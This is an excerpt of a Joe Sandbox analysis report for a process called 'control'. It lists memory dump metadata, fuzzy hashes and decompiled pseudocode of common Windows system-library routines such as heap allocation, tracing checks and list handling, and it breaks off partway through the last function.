0x04643790
0x0464378b
0x0464378b
0x0464378b
0x04643792
0x04643795
0x04643795
0x04643798
0x04643798
0x0464379b
0x0464379b
0x045e91a3
0x045e91a9
0x045e91b0
0x045e91b4
0x045e91b4
0x045e91bb
0x045e91c0
0x045e91c5
0x045e91c7
0x046437da
0x045e91cd
0x045e91cd
0x045e91cd
0x045e91d2
0x045e91d5
0x045e9239
0x045e9239
0x045e91d7
0x045e91db
0x045e91e1
0x045e91e7
0x045e91fd
0x045e9203
0x045e921e
0x045e9223
0x00000000
0x045e9223
0x045e9205
0x045e9208
0x045e920c
0x045e9214
0x045e9214
0x045e91e9
0x045e91e9
0x045e91ee
0x045e91f3
0x045e91f3
0x045e91f3
0x045e91e7
0x00000000
0x045e91db
0x045e9187
0x045e9168

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a701a3c4eed78b84f3ea8ad5d41b9a24f5d18c9dd9d8d1e19d14396db51617d
Instruction ID: 7c9c14dfca763ac621ebdc469b1a5464956969a94d6bc53c69fce66d656c9a4e
Opcode Fuzzy Hash: 0a701a3c4eed78b84f3ea8ad5d41b9a24f5d18c9dd9d8d1e19d14396db51617d
Instruction Fuzzy Hash: 0431F2F0A01281DFEB2DDF6AC488BACBBB1BB88354F188549C45467341E335B880DB95

Uniqueness

Uniqueness Score: -1.00%

Function 04600050 Relevance: .1, Instructions: 81
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E04600050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x46dd360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				E04619ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return E0462B640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E046B8A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = E04619702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x46db1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}

0x04600055
0x0460005d
0x04600062
0x0460006c
0x0460006f
0x04600074
0x0460007a
0x0460007a
0x04600080
0x04600080
0x04600087
0x0460008d
0x0460008f
0x04600093
0x04600095
0x0460009b
0x046000f8
0x046000fb
0x046000fc
0x046000ff
0x04600108
0x04600108
0x046000a2
0x046000a6
0x046000b3
0x046000bc
0x046000c5
0x046000ca
0x0464c01e
0x00000000
0x00000000
0x0464c02d
0x046000d5
0x046000d9
0x0464c03d
0x0464c046
0x0464c046
0x046000df
0x046000e2
0x046000ea
0x046000ef
0x046000f2
0x046000f6
0x04600111
0x04600117
0x04600117
0x00000000
0x046000f6
0x046000d0
0x046000d0
0x00000000

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 358ccfb352c45c6cbe9482c350ab0987c314837a747ca40f6b0c20d0a0d1a7d3
Instruction ID: f0eca370024198cc22db4b6da38d195ef6d793af41ac420d97682909c97f4944
Opcode Fuzzy Hash: 358ccfb352c45c6cbe9482c350ab0987c314837a747ca40f6b0c20d0a0d1a7d3
Instruction Fuzzy Hash: EA317A31601A048FD725CF28D840B9BB3E5FF89718F18856DE49687BA0EA76B801CB90

Uniqueness

Uniqueness Score: -1.00%

Function 04666C0A Relevance: .1, Instructions: 79
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E04666C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E04607D50();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0x46d7b9c; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = L04604620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E0462F3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E04607D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E04629AE0();
						_t23 = L046077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}

0x04666c0a
0x04666c0f
0x04666c10
0x04666c13
0x04666c15
0x04666c19
0x04666c1c
0x04666c21
0x04666c28
0x04666c3a
0x04666c2a
0x04666c33
0x04666c33
0x04666c3f
0x04666c48
0x04666c4d
0x04666c60
0x04666c65
0x04666c69
0x04666c73
0x04666c79
0x04666c7f
0x04666c86
0x04666c90
0x04666c94
0x04666ca6
0x04666cb2
0x04666cbd
0x04666cbd
0x04666cc3
0x04666cc7
0x04666ccb
0x04666cd0
0x04666cd1
0x04666ce2
0x04666ce2
0x04666c69
0x04666ced

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa90866347ae2392f153325682020b48d09d96f396f321d5683e0a003398b515
Instruction ID: b77023b76a36d97a2a7a5e5352753b8b4d8b3148a8dbc9cefbdc980859a7fa9a
Opcode Fuzzy Hash: aa90866347ae2392f153325682020b48d09d96f396f321d5683e0a003398b515
Instruction Fuzzy Hash: BB21ABB1A00A44AFD715DF68E980E2AB7B8FF48744F04406AF905D7791E634FD10CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 046290AF Relevance: .1, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E046290AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E0463D4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E0461E5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L04604620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E0462F3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E0461A2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}

0x046290af
0x046290b8
0x046290bb
0x046290bf
0x046290c2
0x046290c2
0x046290c8
0x046290cb
0x046290cd
0x046614d7
0x046614eb
0x046614eb
0x00000000
0x046614eb
0x046614db
0x046614e6
0x00000000
0x046614f2
0x046614e8
0x00000000
0x046614e8
0x046290d8
0x046290da
0x046290dd
0x046290e5
0x00000000
0x04629139
0x046290fa
0x046290fe
0x04629142
0x00000000
0x04629142
0x04629104
0x04629107
0x0462910b
0x04629110
0x04629118
0x04629147
0x04629148
0x0462914f
0x04629150
0x04629151
0x04629152
0x04629156
0x0462915d
0x04629160
0x04629168
0x0462916c
0x046291bc
0x046291be
0x00000000
0x046291be
0x0462916e
0x04629173
0x04629176
0x00000000
0x00000000
0x0462917c
0x04629180
0x046291b5
0x00000000
0x046291b5
0x04629182
0x04629185
0x04629189
0x00000000
0x00000000
0x0462918e
0x04629190
0x04629198
0x00000000
0x00000000
0x046291a0
0x00000000
0x046291ad
0x046291ad
0x046291b0
0x046291b1
0x00000000
0x04629185
0x0462911a
0x0462911c
0x0462911f
0x04629125
0x04629127
0x00000000

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
Instruction ID: 62a190d7f08961b3a725aa8ba63f04541b2bf4b07212ce0fa9cd385118d17f77
Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
Instruction Fuzzy Hash: 90217FB1A00714EFDB20DF69C944AAAF7F8EB94354F14886AE945A7250F630FD048F90

Uniqueness

Uniqueness Score: -1.00%

Function 04613B7A Relevance: .1, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E04613B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x46d84c4; // 0x0
				_v12 = 1;
				_v8 =  *0x46d84c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L04604620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x46d84c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E0462AA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E0462FA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x46d84c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x46d84c4; // 0x0
					L046077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}

0x04613b89
0x04613b96
0x04613ba1
0x04613bab
0x04613bb5
0x04613bb9
0x04656298
0x04613bbf
0x04613bc2
0x04613bc3
0x04613bc9
0x04613bca
0x04613bcc
0x04613bcd
0x04613bd4
0x04613bd6
0x04613bdb
0x04613bea
0x04613bf7
0x04613bfb
0x04613bff
0x04613c09
0x04613c0a
0x04613c0b
0x04613c0f
0x04613c14
0x04613c18
0x04613c18
0x04613bfb
0x04613c1b
0x04613c30
0x04613c30
0x04613c3d

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e18f49cbb3eb53dcc4a7b73dd5634ef09c1d8d9597459e64e3311c3b8c61354
Instruction ID: 71940a158d62aa4510dab201ab5faf9e1b4c17ba9d60c3253629949eb848684e
Opcode Fuzzy Hash: 7e18f49cbb3eb53dcc4a7b73dd5634ef09c1d8d9597459e64e3311c3b8c61354
Instruction Fuzzy Hash: EF21B0B2A00104EFD704DF58CE81F5AB7BDFB40708F150068E909AB252E771BD55CB94

Uniqueness

Uniqueness Score: -1.00%

Function 04666CF0 Relevance: .1, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E04666CF0(void* __edx, intOrPtr _a4, short _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t21;
				void* _t24;
				void* _t36;
				void* _t38;
				void* _t46;

				_push(_t36);
				_t46 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if(E04607D50() == 0) {
					_t21 = 0x7ffe0384;
				} else {
					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
				}
				if( *_t21 != 0) {
					_t21 =  *[fs:0x30];
					if((_t21[0x240] & 0x00000004) != 0) {
						if(E04607D50() == 0) {
							_t21 = 0x7ffe0385;
						} else {
							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t21 & 0x00000020) != 0) {
							_t56 = _t46;
							if(_t46 == 0) {
								_t46 = 0x45c5c80;
							}
							_push(_t46);
							_push( &_v12);
							_t24 = E0461F6E0(_t36, 0, _t46, _t56);
							_push(_a4);
							_t38 = _t24;
							_push( &_v28);
							_t21 = E0461F6E0(_t38, 0, _t46, _t56);
							if(_t38 != 0) {
								if(_t21 != 0) {
									E04667016(_a8, 0, 0, 0,  &_v36,  &_v28);
									L04602400( &_v52);
								}
								_t21 = L04602400( &_v28);
							}
						}
					}
				}
				return _t21;
			}

0x04666cfb
0x04666d00
0x04666d02
0x04666d06
0x04666d0a
0x04666d0e
0x04666d19
0x04666d2b
0x04666d1b
0x04666d24
0x04666d24
0x04666d33
0x04666d39
0x04666d46
0x04666d4f
0x04666d61
0x04666d51
0x04666d5a
0x04666d5a
0x04666d69
0x04666d6b
0x04666d6d
0x04666d6f
0x04666d6f
0x04666d74
0x04666d79
0x04666d7a
0x04666d7f
0x04666d82
0x04666d88
0x04666d89
0x04666d90
0x04666d94
0x04666da7
0x04666db1
0x04666db1
0x04666dbb
0x04666dbb
0x04666d90
0x04666d69
0x04666d46
0x04666dc6

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84ccadcc0f225b8f243cfcffa18246a8a233d4da7ecec1bd74c07aca5f5964d5
Instruction ID: 85c46b41fa825c8eabec812d6424e72bc605bd4ab8a1561c68f0ff98935eed94
Opcode Fuzzy Hash: 84ccadcc0f225b8f243cfcffa18246a8a233d4da7ecec1bd74c07aca5f5964d5
Instruction Fuzzy Hash: 8F21D0725003449BD311DF69D944B6BB7ECEF91784F08045BB942C72A1F734F909C6A6

Uniqueness

Uniqueness Score: -1.00%

Function 046B070D Relevance: .1, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E046B070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				char _v8;
				intOrPtr _v11;
				signed int _v12;
				intOrPtr _v15;
				signed int _v16;
				intOrPtr _v28;
				void* __ebx;
				char* _t32;
				signed int* _t38;
				signed int _t60;

				_t38 = __ecx;
				_v16 = __edx;
				_t60 = E046B07DF(__ecx, __edx,  &_a4,  &_a8, 2);
				if(_t60 != 0) {
					_t7 = _t38 + 0x38; // 0x29cd5903
					_push( *_t7);
					_t9 = _t38 + 0x34; // 0x6adeeb00
					_push( *_t9);
					_v12 = _a8 << 0xc;
					_t11 = _t38 + 4; // 0x5de58b5b
					_push(0x4000);
					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
					E046AAFDE( &_v8,  &_v12);
					E046B1293(_t38, _v28, _t60);
					if(E04607D50() == 0) {
						_t32 = 0x7ffe0380;
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						_t21 = _t38 + 0x3c; // 0xc3595e5f
						E046A14FB(_t38,  *_t21, _v11, _v15, 0xd);
					}
				}
				return  ~_t60;
			}

0x046b071b
0x046b0724
0x046b0734
0x046b0738
0x046b074b
0x046b074b
0x046b0753
0x046b0753
0x046b0759
0x046b075d
0x046b0774
0x046b0779
0x046b077d
0x046b0789
0x046b0795
0x046b07a7
0x046b0797
0x046b07a0
0x046b07a0
0x046b07af
0x046b07c4
0x046b07cd
0x046b07cd
0x046b07af
0x046b07dc

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
Instruction ID: cfbc225364e55613db376084a129e510f1eaca9d1e6199517ad646e0a1e5e237
Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
Instruction Fuzzy Hash: E3212F36204200AFD705DF28C880AABBBA5EFD0350F04862DFC948B381EB30E949CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0460AE73 Relevance: .1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E0460AE73(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
				void* _t19;
				char* _t22;
				signed char* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				void* _t31;
				intOrPtr _t36;
				char* _t38;
				signed char* _t42;

				_push(__ecx);
				_t31 = __edx;
				_v8 = __ecx;
				_t19 = E04607D50();
				_t38 = 0x7ffe0384;
				if(_t19 != 0) {
					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t22 = 0x7ffe0384;
				}
				_t42 = 0x7ffe0385;
				if( *_t22 != 0) {
					if(E04607D50() == 0) {
						_t24 = 0x7ffe0385;
					} else {
						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t24 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t27 = E04607D50();
					if(_t27 != 0) {
						_t27 =  *[fs:0x30];
						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
					}
					if( *_t38 != 0) {
						_t27 =  *[fs:0x30];
						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t27 = E04607D50();
						if(_t27 != 0) {
							_t27 =  *[fs:0x30];
							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
						}
						if(( *_t42 & 0x00000020) != 0) {
							L17:
							_t25 = _v8;
							_t36 = 0;
							if(_t25 != 0) {
								_t36 =  *((intOrPtr*)(_t25 + 0x18));
							}
							_t27 = E04667794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
						}
						goto L5;
					} else {
						L5:
						return _t27;
					}
				}
			}

0x0460ae78
0x0460ae7c
0x0460ae7e
0x0460ae81
0x0460ae86
0x0460ae8d
0x04652691
0x0460ae93
0x0460ae93
0x0460ae93
0x0460ae98
0x0460ae9d
0x046526a2
0x046526b4
0x046526a4
0x046526ad
0x046526ad
0x046526b9
0x00000000
0x046526bb
0x00000000
0x046526bb
0x0460aea3
0x0460aea3
0x0460aea3
0x0460aeaa
0x046526c0
0x046526c9
0x046526c9
0x0460aeb3
0x046526d4
0x046526e1
0x00000000
0x00000000
0x046526e7
0x046526ee
0x046526f0
0x046526f9
0x046526f9
0x04652702
0x04652708
0x04652708
0x0465270b
0x0465270f
0x04652711
0x04652711
0x04652725
0x04652725
0x00000000
0x0460aeb9
0x0460aeb9
0x0460aebf
0x0460aebf
0x0460aeb3

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
Instruction ID: cb5d4c531cf64aca2c5958a08a8e8d2c6f4645f91218d57f0ace6eb5c693ae49
Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
Instruction Fuzzy Hash: F021BE317016819FEB2A9B68C954B2677E8EF64784F1940E1ED048B7E2F734FC41DAA0

Uniqueness

Uniqueness Score: -1.00%

Function 04667794 Relevance: .1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E04667794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t25;
				void* _t36;
				short _t39;
				signed char* _t42;
				unsigned int _t46;
				void* _t50;

				_push(__ecx);
				_push(__ecx);
				_t21 =  *0x46d7b9c; // 0x0
				_t46 = _a8;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 = _t46 + 0x2e; // 0x2e
				_t36 = _t4;
				_t24 = L04604620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
				_t50 = _t24;
				if(_t50 != 0) {
					_t25 = _a4;
					if(_t25 == 5) {
						L3:
						_t39 = 0x14b1;
					} else {
						_t39 = 0x14b0;
						if(_t25 == 6) {
							goto L3;
						}
					}
					 *((short*)(_t50 + 6)) = _t39;
					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
					_t11 = _t50 + 0x2c; // 0x2c
					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
					E0462F3E0(_t11, _a12, _t46);
					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
					if(E04607D50() == 0) {
						_t42 = 0x7ffe0384;
					} else {
						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t50);
					_t19 = _t36 - 0x20; // 0xe
					_push(0x403);
					_push( *_t42 & 0x000000ff);
					E04629AE0();
					_t24 = L046077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
				}
				return _t24;
			}

0x04667799
0x0466779a
0x0466779b
0x046677a3
0x046677ab
0x046677ae
0x046677b1
0x046677b1
0x046677bf
0x046677c4
0x046677c8
0x046677ce
0x046677d4
0x046677e0
0x046677e0
0x046677d6
0x046677d6
0x046677de
0x00000000
0x00000000
0x046677de
0x046677e5
0x046677f0
0x046677f3
0x046677f6
0x046677fd
0x04667800
0x0466780c
0x04667818
0x0466782b
0x0466781a
0x04667823
0x04667823
0x04667830
0x04667831
0x04667838
0x0466783d
0x0466783e
0x0466784f
0x0466784f
0x0466785a

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a088b62b0ea92a1b3c5ac37424b6d9e4450ace82b8687285910448edd1ae3f2d
Instruction ID: 73129bd205bd630a70231ca10411c53740e16d4ac2009da60672b492024cecbc
Opcode Fuzzy Hash: a088b62b0ea92a1b3c5ac37424b6d9e4450ace82b8687285910448edd1ae3f2d
Instruction Fuzzy Hash: 5B21A172900644ABC725DF69D880EABBBB8EF48745F10456DF90AC7790E634FD00CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0461FD9B Relevance: .1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0461FD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
